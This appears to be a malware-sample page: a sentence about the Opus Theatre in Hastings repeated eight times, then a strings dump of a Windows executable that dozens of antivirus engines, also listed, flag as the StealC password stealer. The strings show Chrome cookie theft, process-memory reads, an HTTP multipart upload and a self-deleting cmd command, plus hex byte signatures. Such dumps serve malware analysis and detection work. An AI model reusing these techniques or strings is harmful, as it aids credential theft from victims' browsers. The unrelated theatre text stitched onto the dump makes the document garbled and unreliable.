The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
>!KK
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
t>!K
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
tt>!
pp|B>>q
aaj_55
UUPx((
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
invalid string position
vector<T> too long
string too long
memcpy
memset
??2@YAPAXI@Z
memcmp
malloc
strlen
memmove
vsprintf_s
strcpy_s
strtok_s
atexit
strtok
??_U@YAPAXI@Z
memchr
??_V@YAXPAX@Z
strncpy
msvcrt.dll
lstrlenA
HeapAlloc
GetProcessHeap
VirtualProtect
WaitForSingleObject
CreateProcessA
lstrcatA
VirtualQueryEx
OpenProcess
ReadProcessMemory
WriteFile
KERNEL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
EncodePointer
DecodePointer
TerminateProcess
GetCurrentProcess
InitializeCriticalSectionAndSpinCount
LeaveCriticalSection
EnterCriticalSection
RtlUnwind
GetProcAddress
GetModuleHandleW
ExitProcess
GetStdHandle
GetModuleFileNameW
GetLastError
LoadLibraryW
TlsGetValue
TlsSetValue
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
WideCharToMultiByte
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
LCMapStringW
MultiByteToWideChar
GetStringTypeW
RaiseException
__CxxFrameHandler3
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVexception@std@@
.?AVbad_alloc@std@@
!This program cannot be run in DOS mode.
Rich_6(
`.rdata
@.data
.pdata
@_RDATA
@.reloc
tcHc\$`
\$ UVWAVAWH
A_A^_^]
\$ UVWH
UVWATAUAVAWH
A_A^A]A\_^]
@SUVWATAVAWH
A_A^A\_^][
UVWATAUAVAWH
A_A^A]A\_^]
VWATAVAWH
A_A^A\_^
H9t$0vmH
H;t$0r
x UAVAWH
u!H!D$(H
UATAUAVAWH
A_A^A]A\]
@USVWATAUAVAWH
A_A^A]A\_^[]
D$(9t$@t
H3E H3E
u/HcH<H
fA;8unI
fA;(t(fA98t
WATAUAVAWH
A_A^A]A\_
fffffff
ffffff
vKfffff
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
ffffff
fffffff
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
p0R^G'
u3HcH<H
WAVAWH
A_A^_
WAVAWH
A_A^_
D$0@8{
p*W4H
p*W4H
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
f9)u4H9j
u%@8j(t
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
fD9t$b
@UATAUAVAWH
e0A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
p0R^G'
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
L$ VWAVH
fD94H}aD
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
A_A^A]A\]
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
WATAUAVAWH
0A_A^A]A\_
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
USVWAVH
A^_^[]
LcA<E3
Unknown exception
bad allocation
bad array new length
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
bad exception
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
56574883EC2889D74889CEE8AAAAFFFF85FF74084889F1E8AAAAAAAA4889F04883C4285F5EC3CCCCCCCCCCCCCCCCCCCC56574883ECAA4889AA488B05AAAAAAAA4831E04889442430488D79AAAAAAAA28E8AAAAAAF8488B4620488B4E28488B96500100004C8D44242849891048C78650010000000000004889FAFF15AAAAAAAA488B4C24304831E1AAAAAAAAAAAAAAAA
56574883EC2889D74889CEE8AAAAFFFF85FF74084889F1E8AAAAAAAA4889F04883C4285F5EC3CCCCCCCCCCCCCCCCCCCC56574883ECAA4889AA488B05AAAAAAAA4831E04889442430488D79AAAAAAAA28E8AAAAAAF8488B4620488B4E28488B96500100004C8D44242849891048C78650010000000000004889FAFF15AAAAAA05488B4C24304831E1E8AAAAAAFC904883
56574883EC2889D74889CEE8AAAAFFFF85FF74084889F1E8AAAAAAAA4889F04883C4285F5EC3CCCCCCCCCCCCCCCCCCCC56574883ECAA4889AA488B05AAAAAAAA4831E04889442430488D79AAAAAAAA28E84BAA7AF8488B4620488B4E28488B96500100004C8D44242849891048C78650010000000000004889FAFF15AAAAF405488B4C24304831E1E8AA33BFFC904883
chrome.exe
chrome.dll
cookies
Google Chrome
C:\Program Files\Google\Chrome\Application\chrome.exe
%d%d%d%d
ChromeFuckNewCookies
--profile-directory="
FFFFFFFFFFFFFFFF
------
Content-Type: multipart/form-data; boundary=----
HTTP/1.1
------
Content-Disposition: form-data; name="
file_name
/c timeout /t 10 & del /f /q "
" & exit
C:\Windows\system32\cmd.exe
KERNEL32.DLL
GetProcAddress
LoadLibraryA
GetCommandLineA
ExitProcess
GlobalAlloc
lstrlenA
HeapAlloc
GetProcessHeap
GetSystemTime
LocalAlloc
LocalFree
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
TerminateProcess
CloseHandle
lstrcatA
ReadProcessMemory
GetLastError
K32EnumProcessModulesEx
K32GetModuleBaseNameA
K32GetModuleInformation
GetSystemInfo
VirtualQueryEx
CreateProcessA
GetModuleFileNameA
WININET.DLL
SHLWAPI.DLL
CRYPT32.DLL
USER32.DLL
NTDLL.DLL
advapi32.dll
version.dll
shell32.dll
InternetCrackUrlA
InternetOpenA
InternetConnectA
HttpOpenRequestA
InternetSetOptionA
HttpSendRequestA
HttpQueryInfoA
InternetCloseHandle
StrCmpCA
CryptBinaryToStringA
CryptStringToBinaryA
wsprintfA
OpenDesktopA
CreateDesktopA
CloseDesktop
NtQueryInformationProcess
OpenProcessToken
GetTokenInformation
LookupAccountSidW
GetFileVersionInfoSizeA
GetFileVersionInfoA
VerQueryValueA
SHGetFolderPathA
ShellExecuteExA
.text$mn
.text$mn$00
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
LoadLibraryA
GetProcAddress
KERNEL32.dll
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
RtlPcToFileHeader
RaiseException
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
EncodePointer
GetStdHandle
WriteFile
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
HeapFree
HeapAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetFileType
GetStringTypeW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
LCMapStringW
GetProcessHeap
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
CreateFileW
CloseHandle
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AVtype_info@@
0-141E1l1
3)31363Q3^3l3y3~3
8%9h9u9~9
=">4>g?m?~?
1%1I1e1
1f2k2x2
3'3.333@3G3L3Y3`3e3r3y3~3
4!4(4-4:4A4F4S4Z4_4l4s4x4
5"5'545;5@5M5T5Y5f5m5r5
6!6.656:6G6N6S6`6g6l6y6
7(7-7:7A7F7S7Z7_7l7r7|7
8"8/868;8H8O8T8a8h8m8z8
9)90959B9I9N9[9b9g9t9{9
:#:*:/:<:C:H:U:\:a:n:u:z:
;$;);6;=;B;O;V;[;h;o;t;
<#<0<7<<<I<P<U<b<i<n<{<
=*=1=6=C=J=O=\=c=h=u=|=
>$>+>0>=>D>I>V>]>b>o>v>{>
?%?*?7?>?C?P?W?\?i?p?u?
00$01080=0J0Q0V0c0j0o0|0
1+12171D1K1P1]1d1i1v1}1
2%2,212>2E2J2W2^2c2p2w2|2
33&3+383?3D3Q3X3]3j3q3v3
4 4%42494>4K4R4W4d4k4p4}4
55,53585E5L5Q5^5e5j5w5~5
6&6-626?6F6K6X6_6d6q6x6}6
7 7'7,797@7E7R7Y7^7k7r7w7
8!8&838:8?8L8S8X8e8l8q8~8
9 9-94999F9M9R9_9f9k9x9
:':.:3:@:G:L:Y:`:e:r:y:~:
;!;(;-;:;A;F;S;Z;_;l;s;x;
<"<'<4<;<@<M<T<Y<f<m<r<
=!=.=5=:=G=N=S=`=g=l=y=
>(>/>4>A>H>M>Z>a>f>s>z>
?"?)?.?;?B?G?T?[?`?m?t?y?
0#0(050<0A0N0U0Z0g0n0s0
1"1/161;1H1O1T1a1h1m1z1
2)20252B2I2N2[2b2g2t2{2
3#3*3/3<3C3H3U3\3a3n3u3z3
4$4)464=4B4O4V4[4h4o4t4
5#50575<5I5P5U5b5i5n5{5
6#6)6.64696?6D6J6X6^6c6i6n6t6y6
77%7*70757;7@7F7P7V7[7a7f7l7q7w7|7
797M7^7e7z7
2K2U2b2
373s3}3
4T4[4r4
6C6J6O6U6\6
6&7-727
99-939A9F9T9Z9h9n9|9
:.:B:V:\:j:o:}:
;!;/;5;C;I;W;k;
<1<7<E<J<X<^<l<r<
> >&>->6>=>D>
4#4X467
9"949:9L9R9d9i9{9
<T<^<p<u<
<1=;=V=
=">/>h>
0-141A1H1M1S1`1g1u1z1
2"2+2j2w2
3&363H3`3x3
;&;>;V;n;
=1=6=@=S=X=b=u=z=
<0U0`0p0
1:2P2b2l2
5N6g6r6
;';>;J;
<0<P<`<
>B?O?X?e?s?
11,191c1
2L3Z3c3s3
7A8U8s8~8
989E9L9Y9c9m9z9
; ;2;y;
<&=N=\=h=s=
1%1=1U1m1
2,212;2N2S2]2p2u2
4V5o5z5
8.8B8K8
:(;5;>;K;Y;w;
5(585H5X5h5x5
6(747A7[7
8O8g8t8
;3=@=W=
3)3q3z3*4
4N5m5|5
6 7d7q7z7
8 8-8=8
<j=w=4>c>p>S?
3(353B3O3d3k3}3
4)4[4e4w4
545L5Z5d5i5s5x5
6(6-676<6I6V6c6{6
7K8h8u8
<7<<<I<_<d<q<
=(>2>h>r>
>$?(?,?0?4?H?j?
,0X0z0
091`1d1h1l1x1
939=9R9\9q9{9
:':J:m:
34H4q4
7(757B7O7\7i7w7
:*:f:t:
=:>e>k>
0C0H0r0
2!3+353_3
4,5054585<5@5D5H5L5P5h5
6$646>6N6X6
7K7T7Z7
879<9I9R9_9{9
: :-:E:K:X:p:}:
? ?P?^?d?r?
1$1I1O1]1c1
3!3'353`3
6)6B6y6
8"868;8I8]8c8q8!9.9E9f9s9|9
: :>:L:Q:^:r:w:
<#<D<K<X<z<
>>>N>[>`>e>q>
4"5/5<5I5V5c5p5~5
6 7,7<7~7
7J8Y8g8t8|8
:6:E:;E;U;e;
<#<8<M<b<
=(>p>|?
072D3Y3n3
6(7W7v7
7'848W8y8
:6:I:S:
;$;T;g;
676B6b6o6
767=7Q7]7r7|7
8#808V8
919:9Q9^9
:6:e:l:
;7;E;h;u;
<$=O=\=
>9>@>T>`>v>
?/?<?f?
12191Z1
3(4H4N4[4}4
8$81888H8R8r8
;%;2;9;@;L;S;h;u;
<*=;=]=d=p=z=
2#212;2n2
5 646I6^6|6
747i8o8{8
9"9(9.959:9@9G9N9S9X9_9f9k9q9w9~9
:":):.:3:::A:F:L:R:Y:^:d:k:r:w:|:
;%;*;0;6;=;B;H;Q;X;_;d;j;r;y;
<!<(</<4<:<@<G<L<R<Y<`<e<j<q<x<}<
="='=-=4=;=@=E=L=S=X=^=d=k=p=v=}=
> >'>.>3>9>?>F>K>Q>X>_>d>i>p>w>|>
?!?&?,?3?:???D?K?R?W?]?c?j?o?u?|?
00&0-02080?0D0I0P0U0[0b0g0m0t0y0~0
1%1*1/161=1B1H1U1[1b1g1m1t1{1
2 2'2.23292?2F2K2Q2X2_2d2i2p2w2|2
3!3'3.33393F3M3T3Y3^3e3l3q3w3}3
4!4*41484=4B4I4P4U4[4a4h4m4s4z4
5$5+52575<5C5J5O5U5[5b5g5m5t5{5
6$6+60656<6C6H6N6T6[6`6f6m6t6y6
<!<P<p<u<T=4>>>K>
0b0<1D1\1w1
343<3O3U3^3e3
4&4L4S4m4t4
5-565B5y5
656?6Z6b6h6v6
7X8]8o8
;;&;-;4;;;B;J;R;Z;f;o;t;z;
;0<_<e<m<
>9>C>I>U>[>d>j>u>
>,?2?\?b?h?~?
0F0i0t0z0
1J1d1~1
6+7E7V7
9,:9:C:Q:Z:d:
<_=k=~=
>>$>3>Z>
3*3<3b3t3
4(4:4S4
9%9K9V9r9
9!;1;A;Q;a;q;
<!<1<A<Q<d<n<t<
81<1@1X1\1
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
<1D1L1T1\1d1l1t1|1
?,?0?@?D?L?d?t?x?
0$0(0,00080P0`0d0t0x0|0
1 1@1\1`1|1
2(202D2L2T2\2`2d2l2
303D3P3X3
484L4X4`4
5@5T5`5h5
6H6\6h6p6
7 7P7d7p7x7
848H8T8\8
9<9P9\9d9
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4
545@5D5H5L5P5
; ;0;P;p;
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
AMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
DKERNEL32.DLL
WUSER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
((((( H
h(((( H
H
image/jpeg
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
ChainingModeGCM
ChainingMode
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
--utility-sub-type=network.mojom.NetworkService
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Clean
Elastic Windows.Generic.Threat
ClamAV Win.Malware.Stealerc-10034234-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.TrojanAitInject.fh
ALYac Gen:Variant.Tedy.612304
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_70% (D)
Alibaba Clean
K7GW Trojan ( 005afa591 )
K7AntiVirus Trojan ( 005afa591 )
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Stealc.A
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky Clean
BitDefender Gen:Variant.Tedy.612304
NANO-Antivirus Virus.Win32.Gen.ccmw
ViRobot Clean
MicroWorld-eScan Gen:Variant.Tedy.612304
Tencent Clean
Sophos Troj/Stealc-AAB
F-Secure Clean
DrWeb Trojan.PWS.StealC.5
VIPRE Gen:Variant.Tedy.612304
TrendMicro Clean
McAfeeD Real Protect-LS!791FCEE57312
Trapmine malicious.high.ml.score
CTX exe.unknown.tedy
Emsisoft Gen:Variant.Tedy.612304 (B)
huorong Backdoor/Meterpreter.bd
FireEye Generic.mg.791fcee57312d4a2
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet W32/Themida.HZB!tr
Antiy-AVL Clean
Kingsoft malware.kb.a.998
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Tedy.D957D0
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Stealerc.GAB!MTB
Google Detected
AhnLab-V3 Trojan/Win.Stealerc.C5675152
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 BScope.Trojan.Downloader
Malwarebytes Spyware.PasswordStealer
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Stealer.Agent!8.C2 (TFE:2:DQwxTsXk3kJ)
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
GData Win32.Trojan.PSE.1Y8LYHX
AVG Win32:PWSX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.